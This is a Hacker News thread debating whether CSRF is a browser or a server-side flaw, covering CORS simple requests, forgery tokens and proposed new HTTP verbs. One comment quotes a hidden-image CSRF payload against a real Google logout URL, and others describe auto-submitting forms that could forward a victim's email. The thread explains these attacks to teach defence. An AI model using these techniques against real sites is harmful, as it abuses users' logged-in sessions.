Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

CSRF isn't a browser vulnerability. It's a serverside application vulnerability.

To say otherwise is to say there there is some trivial policy, just an HTTP header away, that would allow IE, Firefox, and Webkit to coherently express cross-domain request policy for every conceivable application --- or to say that no FORM element on any website should be able to POST off-site (which, for the non-developers on HN, is an extremely common pattern).

There is a list (I am not particularly fond of it) managed by OWASP of the Top Ten vulnerabilities in application security. CSRF has been on it since at least 2007. For at least five years, the appsec community has been trying to educate application developers about CSRF.

Applications already have fine-grained controls for preventing CSRF. Homakov calls these controls "an ugly workaround". I can't argue about ugliness or elegance, but forgery tokens are fundamentally no less elegant than cryptographically secure cookies, which form the basis for virtually all application security on the entire Internet. The difference between browser-based CSRF protections (which don't exist) and token-based protections is the End to End Argument In System Design (also worth a Google). E2E suggests that when there are many options for implementing something, the best long-term solution is the one that pushes logic as far out to the edges as possible. Baking CSRF protection into the HTTP protocol is the opposite: it creates a "smart middleman" that will in the long term hamper security.

This blog post seems to suppose that most readers aren't even familiar with CSRF. From the comments on this thread, he may be right! But he's naive if he thinks Google wasn't aware of the logout CSRF, since it's been discussed ad nauseam on the Internet since at least 2008 (as the top of the first search result for [Google logout CSRF] would tell you). Presumably, the reason this hasn't been addressed is that Google is willing to accept the extremely low impact of users having to re-enter their passwords to get to Google.

Incidentally, I am, like Egor, a fan of Rails. But to suggest that Rails is the most advanced framework with respect to CSRF is to betray a lack of attention to every other popular framework in the field. ASP.NET has protected against CSRF for as long as there's been a MAC'd VIEWSTATE. Struts has a token. The Zend PHP framework provides a form authentication system; check out Stefan Esser's secure PHP development deck on their site. Django, of course, provides CSRF protection as a middleware module.



It's clear that developers need a simple way to specify that a piece of API should not be accesible from third-party sites.

I propose a new set of HTTP verbs, "SECPOST", "SECGET", etc that comes with the implication that it is never intended to be called by third-party sites or even navigated to from third-party sites. It is a resource that can only be called from the same origin. Application developers (and framework authors) could make sure to implement their destructive/sensitive APIs behind those verbs, and browser vendors could make sure to prevent any and all CSRF on that verb (including links and redirects).


Two things.

First, every mainstream web framework already comes with a simple-to-use way to block forged requests. Even if we adopted new HTTP verbs to give them a common name in the protocol, by the time developers are making decisions they're not working with the ALL-CAPS-NAMES-OF-HTTP-VERBS anyways.

Second, there isn't anything inherently "cross-site" about CSRF, so denying off-site POSTs isn't a complete solution to the problem either. Every site that accepts any form of user-generated content must deal with intra-site request forgery as well.

So no, I don't think that's a great idea.

The things that are insecure here are serverside web applications. Changes to the HTTP protocol or to browsers are a red herring. There's no way around it: web developers have to figure out how to write secure code.


Personally, I would be happy to eliminate any possibility of inter-site forgeries. It's unlikely that my bank will be putting user-generated content in front of me any time soon (and if they do I presume that they'll sanitize it well enough to not be a problem).

It troubles me deeply to have CSRF declared a purely server-side application problem. The browser is quite literally my agent in all of my interaction with the web. It is an extension of me, and when it does things that pretend that they are me, that feels very wrong. That is why I propose new HTTP verbs: my browser should know (and verify) that when it sends out a SEC* request, that my eyeballs are on that data and my finger physically clicked that button, and it can do this if those requests are, essentially, tagged as particularly sensitive.

To place the onus soley on the server-side is for me to abrogate my responsibility to fully control my browser-as-agent. Frankly, even if the server successfully rejects forged attacks, it is not acceptable that my browser, acting as my trusted agent, attempted that attack in the first place.


There are 3 major browser codebases. There are hundreds of thousands of web applications, each with different security needs. I think it's lunacy to suggest that the browsers should take on this problem.

At any rate: there isn't going to be SECGET and SECPOST, so the academic argument over whether end-to-end is better than Apple, Mozilla, Google and Microsoft deciding amongst themselves how security is going to work for every web application is moot.


You are missing a critical point: users do not expect software that is under their control to do things that they did not tell it to do, using their credentials, acting as them. Even if all the server-side software in the world were to be secured against such attempts, there would still remain an underlying problem: loss of control of the browser.

While the vast majority of resource requests (both primary and secondary) are beneficial, some are not. The browser currently does not have enough information to make this distinction. New HTTP verbs would give the browser enough information to refuse to directly load damaging resources.


Again: request forgery isn't an intrinsically cross-domain problem. The HTTP protocol change you provided is already worse than the serverside solutions it proposes to supplant.

Serverside request forgery tokens don't rely on browser behavior to function. They provide a much simpler and more direct security model: to POST/PUT/DELETE to an endpoint, you must at least be able to read the contents of the token. This meshes with same-origin security.


The loss of user agent control is a serious problem independent of whether or not a malicious request is accepted. The fact that the user agent crafted and sent the malicious request at all is a problem worth solving. But for some reason you either seem to believe that it doesn't matter that the UA is acting maliciously on users' behalf, that this is an inevitable consequence of the way the internet works, or that it's such a difficult problem to fix that you'd rather ignore it and focus on the server-side. Or perhaps both.

Personally, I don't believe either of those things. Server authors should certainly take point on battling CSRF. But there is an important client-side piece to the puzzle that cannot be ignored. If users cannot even prevent their own browsers from attempting malicious actions on their behalf, then there is something critically wrong with browsers.


I'm actually quite curious about your viewpoint, and why it seems so difficult to shift - set in your ways, so to speak. So let me see if I can't let Charle's Stross give it a try:

"You're right in principle, but you're right for the same reason and to the same limited extent as if you said "people have a responsibility to be aware of the locks on their front door and windows and to use them". Which is that you omit the other side of the social contract: we all have an obligation not to exploit our neighbors' negligence if they leave their door unlocked by burgling them."[1]

[1] http://www.antipope.org/charlie/blog-static/2012/03/not-an-a...


I have no idea what you are trying to say here. This is an engineering discussion, not a dorm room debate.

What you've tried to argue here is that we should add new HTTP verbs to express "this endpoint shouldn't allow cross-domain requests". Or, more generally, that we should add HTTP features to allow browsers to prevent CSRF attacks.

But CSRF isn't a browser security problem. It isn't even necessarily a cross-domain problem! (CSRF is in that respect misnamed.) The specific changes you've suggested would drastically change the HTTP protocol but couldn't even theoretically solve the request forgery problem, not just because of intra-site CSRF but because your suggested locked-down HTTP requests would also break otherwise viable apps --- meaning that many apps couldn't use these features even if they wanted to, and would have to rely on something else for CSRF protection.

The fact is that having browsers police request validity just doesn't make sense. Even if they could do that, they still obviously have to rely on serverside signals to determine whether a request is or isn't valid. If the serverside knows a request isn't valid, it already has the means to block it! Why on earth would the server punt this to the browser?

Your suggestions have the appearance of not being familiar with how CSRF protection works in apps today. It is almost a one-liner in many modern frameworks.


The thing that troubles me is not that you don't like the HTTP verb solution, but that you don't seem to accept the fact that there is a client-side problem to solve in the first place.

Your argument is equivalent to saying that websites should protect themselves from DDoS attacks - and that users should simply accept that their machines will be hacked and will become part of a botnet (or several botnets) at some point in time. In other words, DDoS is a server-side problem, not a client problem. Whereas I (and I think that most people) believe that it is our responsibility to use our computing resources responsibly, and work hard to avoid being included in a botnet.

You seem like a smart person, and I'm sure you have something to contribute to the client-side of this issue, but that won't happen until you are convinced that there is a client-side problem.

In any event, somewhat selfishly I suppose, I've found this discussion quite useful in clarifying my own views on the matter. So, thank you for violently disagreeing with me. :)


Request forgery is nothing like DDoS. I found the rest of your comment too vague to respond to. I can't rebut anything you've said without repeating myself.

You keep saying CSRF is a "client-side problem", but you haven't explained why you think that, other than that it's a problem that is occurring in a client-server system so somehow the client must be involved. That's flimsy logic.


> Request forgery is nothing like DDoS.

Forgery is like DDoS in that they both use the unwitting (and unwilling) compute resources of an intermediate victim to mount the attack. The unit of distribution of the DDoS case is a binary rootkit (for example) and the unit of distribution for a forgery attack is a web page.

The impact of successful DDoS and CSRF attacks are very different, of course, but the mechanism used to carry them out is very similar. In particular, they both differ from an ordinary hacker-to-target penetration, DoS, forgery etc. attack.


You didn't answer my question.


You didn't ask a question (was there a question mark in your post that I missed?). You did, however, make an assertion which I corrected.

In an honest, respectful discussion that would occasion a response along the lines of either: "Ah, I didn't think about it like that. Let me see about adjusting the line of my reasoning," or, "No, your correction is invalid because..."


I think you would enjoy the book _The Tangled Web_ by Michel Zalewski, of Google's browser & web security team.


Is the following accurate:

If a form is served from domain A (via GET) in to an iframe on a page that was served from domain B, then the JS on the page from domain B is prevented from reading or writing data on the page from domain A (unless an x-domain policy is in place) though it may be able to post it.


Yes it wont be able to read it. But that's not what they are after. What they do want is to execute some user action on the server side. So this action would have taken place just by executing the GET/POST request.


Thank you. I just wanted to make sure I understood the basis of why CRSF Tokens work.


I see some points but >CSRF isn't a browser vulnerability. It's a serverside application vulnerability. you didn't prove this one. CSRF is a browser vulnerability. ANd I don't care about another stuff you said further - you probably right that most popular frameworks have the protection out of box - I know it, no surprise here:). But I did pretty wide audit - only rails' protection looks really elegant. Hm.. probably I'm too much fan of rails, true.

And, please >Baking CSRF protection into the HTTP protocol is the opposite: it creates a "smart middleman" that will in the long term hamper security. Surely, I don't mean "Stop secure your apps from CSRF, it's not your problem". I just want to make browsers think about the issue as millions of developers have to. Because it is their issue, they are in charge. But we are fixing it on the backend(and we will have to for a next 10 years definitely)


CSRF is NOT a browser vulnerability. The browser is doing exactly what it's supposed to do: load content. The browser can not (and should not) attempt to identify the "evil" HTTP requests from the "good" ones. The browser's job is to make requests.

Now, you could argue the browser's job should be to implement security features as well. It does, after all, implement the same-origin policy. But, if you think about it, there is no good way for the browser to fix the CSRF issue. You can ask the user, which is what's suggested, but that never really works. They'll do one of two things: click "okay" every single time, or stop using your browser.

I would guess well over half of all websites do one of the following: (1) load an external JS file, (2) load an external image, (3) load an external CSS file, (4) use an iframe which points to a different origin, (5) use a JS redirect, (6) use a meta redirect, or (7) open a new window.

The proposed "solution" to CSRF stops ALL of these use cases. The user would have to manually approve each and every one of them. Given that well under 1% of alerts would be true attacks, the user would almost definitely "okay" on the attacks as well: they would have been trained by thousands of other alerts that this is an acceptable thing to do.

There was a paper by Barth and Jackson on CSRF defenses where they propose an Origin header, but that's the extent to which security is implemented in the browser. It is fundamentally up to the web application for verifying the user did in fact initiate the request. No amount of code in the web browser can get around this fact.


>I would guess well over half of all websites do one of the following: (1) load an external JS file, (2) load an external image, (3) load an external CSS file, (4) use an iframe which points to a different origin, (5) use a JS redirect, (6) use a meta redirect, or (7) open a new window. The proposed "solution" to CSRF breaks ALL of these uses.

You definitely kidding me. Please point out where in my post I said to deny ALL requests. I was talking about ONLY POST requests. Probably I forgot to add it :) So, I'm talking only about forms sending and GET is ok sure.


Either you do it for everything, or you do it for only POST and you end up missing half of the vulnerabilities. Correct me if I'm wrong, but your CSRF attack used a GET request, did it not? [1]

Web applications make state-changing operations on GET requests. You might not like it, but they do.

[1] <img src="https://mail.google.com/mail/u/0/?logout style="display: none;" />


>Web applications make state-changing operations on GET requests. You might not like it, but they do.

but when developer made a mistake with GET it is 100% his problem - it's out of question. he should be punished :D


Nonsensical. CSRF isn't God's punishment for REST-lessness.


You're both just choosing different places to draw the line between developer responsibility and browser responsibility.


That is like saying "you're both just suggesting two totally different designs for the HTTP security model".

His model is wrong. Again: I assume he wants to know that, so, bluntness.


Perfectly solid web apps routinely ask browsers to POST to other domains.


So rather than deny ALL requests, I think it would work if browsers merely stopped passing cookies on cross-site POST form submissions, no?

Then if 3rd party sites wanted to still use form submissions, they could use an auth token in the form (though I'm unsure why they would do this instead of using JSONP).


Firefox already blocks off-domain POST requests, unless the 3rd party domain responds to an OPTIONS preflight request.

So, I'm talking only about forms sending and GET is ok sure.

Google's logout CSRF works because the logout link is a GET request. So, no, there is no quick fix.


No it does not.

---

https://developer.mozilla.org/en/http_access_control#Simple_...

A simple cross-site request is one that:

- Only uses GET or POST. If POST is used to send data to the server, the Content-Type of the data sent to the server with the HTTP POST request is one of application/x-www-form-urlencoded, multipart/form-data, or text/plain.

- Does not set custom headers with the HTTP Request (such as X-Modified, etc.)

---

This is actually a big deal, since it means you can send a cross-domain mutlipart-POST with no preflight. That allows for an effective CSRF attack against file upload systems.

And of course, cross-domain POST requests via <form> tags have always worked and will continue to work.


Am I missing something here?

Let's say you're logged into Gmail and Gmail had no CSRF protection anywhere.

You're logged in while visiting my site. In my site, I include a little bit of JavaScript to make a POST request to Gmail telling it to forward copies of all your incoming email to my email address.

This will not work even without CSRF protection. It would only work if Google sends back the header Access-Control-Allow-Origin: mysite or Access-Control-Allow-Origin: * as noted in the section you linked to.

Of course, I could also try to trick you into filling out a form whose method actually is pointed at Gmail's and include all the hidden input tags to set you up for forwarding emails to me, but you would know something fishy is going on because it would redirect you to Gmail.


"This will not work even without CSRF protection."

It actually will work.

What you're describing is what's known as a "simple" request in XMLHttpRequest terms. That means there is no pre-flight necessary. Your browser will simply make the POST as requested and receive the response. It won't make the response available to you since the Access-Control-Allow-Origin header isn't set, but you're a malicious attacker in this example and you don't care what the response is: you just care that you were able to make the request. ;-)

You could even do this by creating an HTML form that POSTs to the right URL and using JavaScript to submit it automatically when the page loads. Same exact thing: no CORS checks.

If a pre-flight were necessary you would be right. The browser would send an OPTIONS request to the server, the server would respond without the appropriate headers, and the POST request would never be sent.

Let me know if any of this needs further explanation!


Oh, I see now. I had assumed that because I couldn't get the response, that the request itself was blocked.

Thanks!


I would like to know one thing.

Who the hell thought it was a good idea to allow crossdomain XmlHttpRequests? Given that the standard say that post is for modification no other website should ever make thoes requsts.


The CORS standard for 'simple' POSTs is no different than what you can already submit via a form from a technological perspective. In that way, it actually makes a lot of sense.

And the whole point of CORS is that some websites do want to make those requests. ;-)


"I did pretty wide audit - only rails' protection looks really elegant."

This is handwaving. You were wrong about this. I assume you want to know that, so I'm saying it bluntly.

"I just want to make browsers think about the issue as millions of developers have to. Because it is their issue, they are in charge."

No, the web browsers are not in charge. The secrets and sensitive actions are occurring on the servers, not in the browsers. The servers are what matter. The browser isn't protecting your email. The server is. The browser isn't protecting your bank account. The server is. The browser isn't controlling who is or isn't your Facebook friend. The server is.


> The difference between browser-based CSRF protections (which don't exist)

What about the X-Frame-Options and Origin headers? They are browser-based mechanisms that hint server side, right?

(not for the classic POST case though...)


Neal addressed XFO downthread:

http://news.ycombinator.com/item?id=3778700

Read his comment. It's great.




Consider applying for YC's Winter 2026 batch! Applications are open till Nov 10

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: